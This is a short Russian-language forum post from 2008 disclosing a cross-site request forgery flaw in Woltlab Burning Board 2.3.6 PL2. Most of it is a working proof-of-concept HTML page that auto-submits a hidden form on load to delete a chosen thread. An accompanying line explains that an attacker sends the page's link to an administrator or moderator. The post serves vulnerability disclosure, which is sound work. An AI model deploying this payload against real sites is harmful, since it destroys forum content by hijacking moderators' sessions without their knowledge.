25.01.2008, 03:11
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
Woltlab Burning Board 2.3.6 PL2 Remote Delete Thread XSRF Vulnerability
XSRF Vulnerability
Vulnerable: Woltlab Burning Board 2.3.6 PL2
Код HTML:
<html>
<head>
</head>
<body onLoad="javascript:document.it.submit()">
<form action="http://localhost/xampp/wbb2/modcp.php" method="post" name="it">
<input type="hidden" name="action" value="thread_del" />
<input type="hidden" name="threadid" value="5" /> <!-- Здесь id темы-->
<input type="hidden" name="send" value="send" />
<input type="hidden" name="sid" value="" />
<input type="submit" accesskey="S" value="Ja" class="input" />
</body>
</html>
Атакующий может отправить администратору/модератору ссылку на страницу с вышеописанным кодом и тогда тема с указанным id будет удалена.
Последний раз редактировалось iddqd; 25.01.2008 в 11:19..
|
|
|